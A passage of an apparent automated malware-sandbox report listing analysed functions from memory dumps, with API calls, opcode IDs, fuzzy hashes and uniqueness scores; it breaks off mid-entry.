                        • Instruction ID: efe113fc6645d98589ea3bd04aaf664962a406f2dfd822c77fa156b0e03b1a6e
                        • Opcode Fuzzy Hash: 6f46485cbdbfac8a494703e9627e819cf8a3f920beafc3414c0b2db7c7c6cabd
                        • Instruction Fuzzy Hash: E411E0B5C006498FDB20DF9AD444BDEFBF4EB88228F14841AD829B7710D375A549CFA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0145DA3C, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                        Download Yara Rule
                        APIs
                        • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0145FE28,?,?,?,?), ref: 0145FE9D
                        Memory Dump Source
                        • Source File: 00000012.00000002.483535165.0000000001450000.00000040.00000001.sdmp, Offset: 01450000, based on PE: false
                        Similarity
                        • API ID: LongWindow
                        • String ID:
                        • API String ID: 1378638983-0
                        • Opcode ID: 244db9b985106703905de532f6723f7ed5188afcd141f48e191ef5f9b1b92f69
                        • Instruction ID: 92272ee06239eba13f2139d414017f1745ff33a9d0b140d9a8b5db9504d8bb88
                        • Opcode Fuzzy Hash: 244db9b985106703905de532f6723f7ed5188afcd141f48e191ef5f9b1b92f69
                        • Instruction Fuzzy Hash: AB1133B58002098FDB20DF9AD588BDFBBF8EB48324F10841AE915B3301C374A944CFA6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0145FE38, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                        Download Yara Rule
                        APIs
                        • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0145FE28,?,?,?,?), ref: 0145FE9D
                        Memory Dump Source
                        • Source File: 00000012.00000002.483535165.0000000001450000.00000040.00000001.sdmp, Offset: 01450000, based on PE: false
                        Similarity
                        • API ID: LongWindow
                        • String ID:
                        • API String ID: 1378638983-0
                        • Opcode ID: 2003a55cb0bf59e66f8a98aec8b35c3399243fef90db9ae7ca655a56a77035a2
                        • Instruction ID: cdb910ccaf88302224cfa68610dcaeac9e15e578beb3eb0c8aeed455d7f160ad
                        • Opcode Fuzzy Hash: 2003a55cb0bf59e66f8a98aec8b35c3399243fef90db9ae7ca655a56a77035a2
                        • Instruction Fuzzy Hash: 791103B58002099FDB10DF9AD585BDEBBF8EB48324F10841AE915B3711C374A944CFA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 06580880, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID: h?l
                        • API String ID: 0-593827334
                        • Opcode ID: 2c1352437f333d09637f54959aeec0e1e930bba4abb15a8012299bcaecdd3098
                        • Instruction ID: beeb54fb6e623f986730434292bea392b07b7cea778223b7497b8a68ce5292c8
                        • Opcode Fuzzy Hash: 2c1352437f333d09637f54959aeec0e1e930bba4abb15a8012299bcaecdd3098
                        • Instruction Fuzzy Hash: 3F21D331B10111CFC744DF68D894969B7B5FF89224B2585AAD519EB7A2DB30EC0ACB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0658581B, Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID: d-l
                        • API String ID: 0-1317474975
                        • Opcode ID: 6d2aec2ba4047d75339d0007bfbdd9fa9fe3b0edc3c3f9e639dfb27eea81bc78
                        • Instruction ID: de650db8385f6e92398c471e017c4ef330508400429fdb2c1af4d77cc92426ed
                        • Opcode Fuzzy Hash: 6d2aec2ba4047d75339d0007bfbdd9fa9fe3b0edc3c3f9e639dfb27eea81bc78
                        • Instruction Fuzzy Hash: B0219A70E142088FDB88EFA5C484BED7BF2BB88214F6484A9D401BB790DB759D45CFA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0658575B, Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID: 3<
                        • API String ID: 0-1060474155
                        • Opcode ID: abef28135bbfaa59287063548da0c47aeeb420a5edeede8c0028a54d285d1b7a
                        • Instruction ID: a571c373f54afc461f4860016c0e043101d9f74bfffe7e7de543d608e218c09c
                        • Opcode Fuzzy Hash: abef28135bbfaa59287063548da0c47aeeb420a5edeede8c0028a54d285d1b7a
                        • Instruction Fuzzy Hash: 6BE04F71104B405BC391DB34E816746BFE29B41228F4989AE949A8B743E7659806CBC4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 06584A00, Relevance: .3, Instructions: 289COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 13e3321847c9c4ecdb35f87844c6965f892f603dd2fc90d47c32620a67e2a57f
                        • Instruction ID: 1356d5232f1ded21a840867b0cdadce1c1675593b89393f43726acc0e22ee8a4
                        • Opcode Fuzzy Hash: 13e3321847c9c4ecdb35f87844c6965f892f603dd2fc90d47c32620a67e2a57f
                        • Instruction Fuzzy Hash: 1DC15E31E00656CFCB14EFA8C4506ADB7B2BF85304F118AA9D859BB751EB30E985CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 065844C0, Relevance: .2, Instructions: 205COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 68a029eb422b38a5de59996d9ad6db62caa4d47a50eabdedc3c304cdaa73df6e
                        • Instruction ID: 206515f8d1ff6e518e24c868bf7ad28f74a257ee9c3e26dfaa1230d4ba82aa68
                        • Opcode Fuzzy Hash: 68a029eb422b38a5de59996d9ad6db62caa4d47a50eabdedc3c304cdaa73df6e
                        • Instruction Fuzzy Hash: 78718F30B006068FDB54EF69C8909BFB7F2BF88604B14892DE957A7B54DB31E905CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 065830A8, Relevance: .2, Instructions: 190COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cf6def55f5df25d177b49d6711373dcac55de8ae3e9f1cbf5207c39dd4f2f0e6
                        • Instruction ID: 181971b0a2a2c6077715100cde4054f623b5813ac7fc23458dd360f3093d6795
                        • Opcode Fuzzy Hash: cf6def55f5df25d177b49d6711373dcac55de8ae3e9f1cbf5207c39dd4f2f0e6
                        • Instruction Fuzzy Hash: 28718E30A04204CFDB54EBA9C884BAAB7F2BF88B04F148868D416A7B50DB75ED45CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 06584EF0, Relevance: .2, Instructions: 158COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a133740e56e5d32a56c9d77885baad8af5986fd7d2badc03dcda50013e8870ad
                        • Instruction ID: eaea78de408d53910d10dbd92218cb4292460fa0eb3487c7a6b6fac443952ebc
                        • Opcode Fuzzy Hash: a133740e56e5d32a56c9d77885baad8af5986fd7d2badc03dcda50013e8870ad
                        • Instruction Fuzzy Hash: 5A51DF31A14625DFCB40FBA8D4448A9F7B2FF84204B518A6AE949BB751EF30EC45CBD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 065852D8, Relevance: .1, Instructions: 142COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 687cf59f4092382bf70459cf2f5ede0c3e288204c3e395ba9b22984220320caf
                        • Instruction ID: f6cebe29474ae861e989d4fbc9d20d115adcfed48005f916d13eb5cb33718f08
                        • Opcode Fuzzy Hash: 687cf59f4092382bf70459cf2f5ede0c3e288204c3e395ba9b22984220320caf
                        • Instruction Fuzzy Hash: 08517030A10305DFDB98EFA5D5446AEB7B2FF85304F148529D406BBB40FBB99885CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 065849F3, Relevance: .1, Instructions: 139COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5e5f4fd064136ca1ffaaac3e2c5d74be848fed0f01720a99f804e471e3f2229f
                        • Instruction ID: 12cff61c2d985b81be4e0a4ea370e036ae168ebee5745c86100bdd9d406c529a
                        • Opcode Fuzzy Hash: 5e5f4fd064136ca1ffaaac3e2c5d74be848fed0f01720a99f804e471e3f2229f
                        • Instruction Fuzzy Hash: 6A512F70E0025ACFDB54EF64C54069EBBF2BF45304F508AA9D849BB751EB70AD85CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 06583098, Relevance: .1, Instructions: 127COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 77bd5baf231bbdefd99a5c0568bd58111534c9994b27ccca31bcd29353c37dcf
                        • Instruction ID: ae98c2486a198b5c736735a74f65b3e1faeb9aaf7a4e6461913d3e7633f73535
                        • Opcode Fuzzy Hash: 77bd5baf231bbdefd99a5c0568bd58111534c9994b27ccca31bcd29353c37dcf
                        • Instruction Fuzzy Hash: 9A51A330A04604CFEB54EBA9C884BAAB7F2BF48B10F148969D452A7A50DB35EC45CFD0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 065841D0, Relevance: .1, Instructions: 120COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b1590b6ff360a21df52589df04add3041f1d53ab359309a7ec049bf4d0313eb8
                        • Instruction ID: bc3552f9f99d13f3b44766896e6c39f811288a453e0e0731b35e1433ef894541
                        • Opcode Fuzzy Hash: b1590b6ff360a21df52589df04add3041f1d53ab359309a7ec049bf4d0313eb8
                        • Instruction Fuzzy Hash: 42410835A041059FDB44EBA8C480DEDBBF2BF88224F158495E912BB721DB35EC41CFA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 065848D8, Relevance: .1, Instructions: 110COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 735c52592548a07f52d1f0b9af72b5b69817e9555d9368fc9d44c719d2d6f560
                        • Instruction ID: 4f9e513e6cecc0bf14ad3fd83e0fb0d1d24a19f9f6fe18fc37e339577acc34a0
                        • Opcode Fuzzy Hash: 735c52592548a07f52d1f0b9af72b5b69817e9555d9368fc9d44c719d2d6f560
                        • Instruction Fuzzy Hash: AC313531A083568FC750BBB898405BAFBE4FF89200B108A77D859E7A01E721D841C7D1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 065854D8, Relevance: .1, Instructions: 102COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 57269b1a6ad41518a7e15f26b36da957769f72c00bbc815329b82343aae68662
                        • Instruction ID: 82338239a6db2be895ebc12d26445dd8ede899e28130456b37b855822dd3f97a
                        • Opcode Fuzzy Hash: 57269b1a6ad41518a7e15f26b36da957769f72c00bbc815329b82343aae68662
                        • Instruction Fuzzy Hash: 4731C431A103518FDB58EFB4D4046AEB7B2FFC5304B14866DD049ABB51FB79A886CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 065851B8, Relevance: .1, Instructions: 97COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3ccd5df920041b47c84a4065cb7d1ef10b59d494d9316c4ef897b7baedd68a00
                        • Instruction ID: f9fa57b2e9eef9e262429568fd409a979b3dc6f3644f491c1448f114cda20213
                        • Opcode Fuzzy Hash: 3ccd5df920041b47c84a4065cb7d1ef10b59d494d9316c4ef897b7baedd68a00
                        • Instruction Fuzzy Hash: 82311E30A05B41CFD7B9EF6A8850366B7E1BF85205F14C86EC49B96E50EB79A445CF40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 065844B0, Relevance: .1, Instructions: 92COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ad422af114ce34ff2cd9d1b47c8759a66372194076e30d03b08f04323fe0efdd
                        • Instruction ID: b70fabcbe128b23415230ac5d11313e18a133622db693ca35189fbfb72377289
                        • Opcode Fuzzy Hash: ad422af114ce34ff2cd9d1b47c8759a66372194076e30d03b08f04323fe0efdd
                        • Instruction Fuzzy Hash: 2431A170A04706DFD751EB68D880A7EFBF1BF84200F148E1AE9A6A7E51D730E845CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 06582E85, Relevance: .1, Instructions: 92COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4aec9f8d0951a115313eeb0763826444de83f7064e8a832cd12b862c248414a2
                        • Instruction ID: 81fb999795d9177babdab682431f2ae2ca2ececc4338b04fc6a62694ef62466c
                        • Opcode Fuzzy Hash: 4aec9f8d0951a115313eeb0763826444de83f7064e8a832cd12b862c248414a2
                        • Instruction Fuzzy Hash: 383136B1D002489FDB11DFA9D585AEEBFF1BF48314F14802AE409BB650DB749945CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0658545F, Relevance: .1, Instructions: 90COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 89667e0d5b517badda2e854b224fb2af6db56830b04826556fd5776728cd029c
                        • Instruction ID: adcdd6ee6f23d8910103817005de6da0809b18a6836e193fffc9b5041346b942
                        • Opcode Fuzzy Hash: 89667e0d5b517badda2e854b224fb2af6db56830b04826556fd5776728cd029c
                        • Instruction Fuzzy Hash: 9031A630A102558FDB58EFB5D4046ADB7B2FFC5304B148629D409BBB51EB79A886CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0658546B, Relevance: .1, Instructions: 90COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 89667e0d5b517badda2e854b224fb2af6db56830b04826556fd5776728cd029c
                        • Instruction ID: adcdd6ee6f23d8910103817005de6da0809b18a6836e193fffc9b5041346b942
                        • Opcode Fuzzy Hash: 89667e0d5b517badda2e854b224fb2af6db56830b04826556fd5776728cd029c
                        • Instruction Fuzzy Hash: 9031A630A102558FDB58EFB5D4046ADB7B2FFC5304B148629D409BBB51EB79A886CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 06583488, Relevance: .1, Instructions: 87COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6505faee927725340a8dd48e2bad649ed72e45468b66362b0e4b538cca58c1ae
                        • Instruction ID: 0dfc8401b184b5b8429cc95b57519329ccfe8f94871b5511f9e758eedb59c596
                        • Opcode Fuzzy Hash: 6505faee927725340a8dd48e2bad649ed72e45468b66362b0e4b538cca58c1ae
                        • Instruction Fuzzy Hash: 6E319031D10629CBCB11BBB8D8180EDB772FF84214B154A29D54677750FF39A959CBC1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 06581F18, Relevance: .1, Instructions: 85COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 65c621d8d335787f713ccc622d2e6a449affe5bc25dd127df9ce6604867b057c
                        • Instruction ID: 780fac12a2cf298317fba9281f99639404d91017b423c65e05ee6800ea2e605d
                        • Opcode Fuzzy Hash: 65c621d8d335787f713ccc622d2e6a449affe5bc25dd127df9ce6604867b057c
                        • Instruction Fuzzy Hash: 2D318230B146158FD755BBB5D41D36E7BE6BF84210F40A469E016E7B54DF348902CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 06583479, Relevance: .1, Instructions: 84COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c59e9e6559baf94fb4aed6544c8bd8e32beb6ab4b6eeacbb8bd456966d0cc37a
                        • Instruction ID: f595e6bab69fc0ab13811f537f1545558bfee7ff410428358e21fbf4eb657711
                        • Opcode Fuzzy Hash: c59e9e6559baf94fb4aed6544c8bd8e32beb6ab4b6eeacbb8bd456966d0cc37a
                        • Instruction Fuzzy Hash: 0D319F31D00629CEDB11ABB8D8181EEB7B2FF84210F044A29D546B7A50FF786959CBD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 065852C7, Relevance: .1, Instructions: 84COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 03a4bd9c97cff38b7fabdda44486cc40c7f79b56a147fdcda496f946507ce4fb
                        • Instruction ID: e342ac15506050cf0a800c3ee84698f7354b6f2f52c52e28e4cdb0b09ff2f86f
                        • Opcode Fuzzy Hash: 03a4bd9c97cff38b7fabdda44486cc40c7f79b56a147fdcda496f946507ce4fb
                        • Instruction Fuzzy Hash: C4318470A04B41CFDBA8EF6AC84065AB7E1FF84704F14882ED147ABB54FBB59845CB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 06582B71, Relevance: .1, Instructions: 84COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d5d9e20fa9518891e797a9136fa9f534fc5a12636ceb7277d0e68b09f8a683b0
                        • Instruction ID: ca52a089a6e759c5ce0822a5f05e0ecee93703106d54d444108c5b58ef5ffd1d
                        • Opcode Fuzzy Hash: d5d9e20fa9518891e797a9136fa9f534fc5a12636ceb7277d0e68b09f8a683b0
                        • Instruction Fuzzy Hash: 7F31AD30A11305AFDB54EB75C401AAABBE6BF89304F545829E502EBB91DB31E941CBE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 06582B80, Relevance: .1, Instructions: 84COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7a19296229b9e3c2a0388754286d31cdcac49d522dbe41c745b32c9d1c649850
                        • Instruction ID: c0b9d6dcbf51c4e7eadecdd259683875ec2777d33e2a74650376c54045397957
                        • Opcode Fuzzy Hash: 7a19296229b9e3c2a0388754286d31cdcac49d522dbe41c745b32c9d1c649850
                        • Instruction Fuzzy Hash: 5D31AB30B103049FDB54EB75C404A6EBBE6BF89304F148929E502ABBA1DB31E942CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 06582E90, Relevance: .1, Instructions: 83COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9e7d6346745ddfbeea800e075d3dc3115d9315e078f718c81000033f268327a6
                        • Instruction ID: 6697b39252ceb4e9c22452cbc6de348baa149632bfd4ad4a033574f23b4cec97
                        • Opcode Fuzzy Hash: 9e7d6346745ddfbeea800e075d3dc3115d9315e078f718c81000033f268327a6
                        • Instruction Fuzzy Hash: B3310270D002489FCB14DFA9C584AEEBFF5BF48314F648429E419BB650DB749A45CFA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 06583628, Relevance: .1, Instructions: 81COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a3f21106b699c5051a500e287cecef730608a8c89b114e8ec6e730b228859987
                        • Instruction ID: a2f3715ebe122d5cae717b4d248269a73a8744e04af4ee4d44aa4ce11327e91f
                        • Opcode Fuzzy Hash: a3f21106b699c5051a500e287cecef730608a8c89b114e8ec6e730b228859987
                        • Instruction Fuzzy Hash: BE318431E0421ADFDB14EFA9C4406DEF7B5FF89300F11862AE54AB7640DB359545CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 06582888, Relevance: .1, Instructions: 81COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ab0a00e7ef946012cbfc5bf904554d959c2bc54175536e3b98742dad5f75af76
                        • Instruction ID: da95ae02948751917ca3e19765da549c36c389a5f35d5e71bff5e810ef0675dd
                        • Opcode Fuzzy Hash: ab0a00e7ef946012cbfc5bf904554d959c2bc54175536e3b98742dad5f75af76
                        • Instruction Fuzzy Hash: 8F21E131A14224DFEF55AB69C4006FDBBA2FF88305F00857AD546BBB40CB359A85CBE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 06581F28, Relevance: .1, Instructions: 80COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2f36f01799d9b816e27289dbd6d8c0a43f49c85939c36ceb5d78916a4614c2ef
                        • Instruction ID: bc49245586133784d0fe8a6bdbc8be3148cc21248e720f820401229d37f3d595
                        • Opcode Fuzzy Hash: 2f36f01799d9b816e27289dbd6d8c0a43f49c85939c36ceb5d78916a4614c2ef
                        • Instruction Fuzzy Hash: 89217E30B106158FD794BBB5D41D36E7BE2BF84215B50A469E016E7B50DF389902CFA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 06583638, Relevance: .1, Instructions: 76COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c372d7545d95fc4ad0d08d6f4d18cacdf543b023325e49d423fe8d1329ac55a8
                        • Instruction ID: a827e8e66679e7f6e41ba27b3886afcc54ddaa5852d1655bfd57bad6abfb7710
                        • Opcode Fuzzy Hash: c372d7545d95fc4ad0d08d6f4d18cacdf543b023325e49d423fe8d1329ac55a8
                        • Instruction Fuzzy Hash: 44217331E0420ADFCB54EFA9C8506DEF7B5FF89300F11862AE14AB7640DB35A945CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 06580C38, Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: de83ecc43c1bb007547eede1a0a2a8c533f14aab548fb5bfc7d6ab8decd1d2ab
                        • Instruction ID: 08c6ab0189c5996cfe7b2d26f08a6c4462eae5d357a9cfde39c2d937131c6ffa
                        • Opcode Fuzzy Hash: de83ecc43c1bb007547eede1a0a2a8c533f14aab548fb5bfc7d6ab8decd1d2ab
                        • Instruction Fuzzy Hash: 3811B1317001209F9758FB68D85097EB3ABFFC86143148429E506EB791CF36EC06CBA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 06585510, Relevance: .1, Instructions: 71COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5f241eb9db19b23c932fc70494826da107dd54d9edab959295525585f38de86c
                        • Instruction ID: b308ec3e9b94ee7924b9dec4602e46998026f3df4d286fbd8ac40fee57582f51
                        • Opcode Fuzzy Hash: 5f241eb9db19b23c932fc70494826da107dd54d9edab959295525585f38de86c
                        • Instruction Fuzzy Hash: 6F212871D04309DFDB94DF61D0805AEBBB2FF88354F20896AE416AB641E732A946CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 06584327, Relevance: .1, Instructions: 71COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 800cc3543c9acada7474720d2666061b31d4ea7886cdf5448276a500045eceec
                        • Instruction ID: 683489901f6dae68bc3510241f31a66489f8117117e0d284430475e796508994
                        • Opcode Fuzzy Hash: 800cc3543c9acada7474720d2666061b31d4ea7886cdf5448276a500045eceec
                        • Instruction Fuzzy Hash: 2531EA35A001059FDB44DBA8C580EEDBBF2FF88224F1A4594EA05AB726D736EC41CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 06583388, Relevance: .1, Instructions: 65COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 912769475b8bc148c415a63931afa9f388393d84c2fcf8d7eafe017c5c2cd5ab
                        • Instruction ID: 9a5ec4ed647782cfca3423fcab78967377ee33d6be5064826bd76d9fadb4f3f6
                        • Opcode Fuzzy Hash: 912769475b8bc148c415a63931afa9f388393d84c2fcf8d7eafe017c5c2cd5ab
                        • Instruction Fuzzy Hash: 9F219630A04214CFDB96EBE5C4487A9BBE1BF85A04F14447AD449EBA61DF729842CBD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 06584700, Relevance: .1, Instructions: 63COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8b46446a6dd447ec4164ad540e7159bffa1115328e989c0922d8903a89de2415
                        • Instruction ID: 54363dd03a9029ab1853c12b6412210089efc7e086fc34bfc6ecada96c193aaf
                        • Opcode Fuzzy Hash: 8b46446a6dd447ec4164ad540e7159bffa1115328e989c0922d8903a89de2415
                        • Instruction Fuzzy Hash: 09113436500119EFCF029F80DC08DA9BFB2FF09320B0A8494F605AB072CB36D566EB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 06583398, Relevance: .1, Instructions: 63COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000012.00000002.494288967.0000000006580000.00000040.00000001.sdmp, Offset: 06580000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8445b95ddf155c554889faabbeb9afb191624b6dd6e47e4e818602b161cb481a
                        • Instruction ID: d0176a587cc293ae3c1521956224e1735e9ab3b3d3541c44b31f5eccc8d284b6
                        • Opcode Fuzzy Hash: 8445b95ddf155c554889faabbeb9afb191624b6dd6e47e4e818602b161cb481a
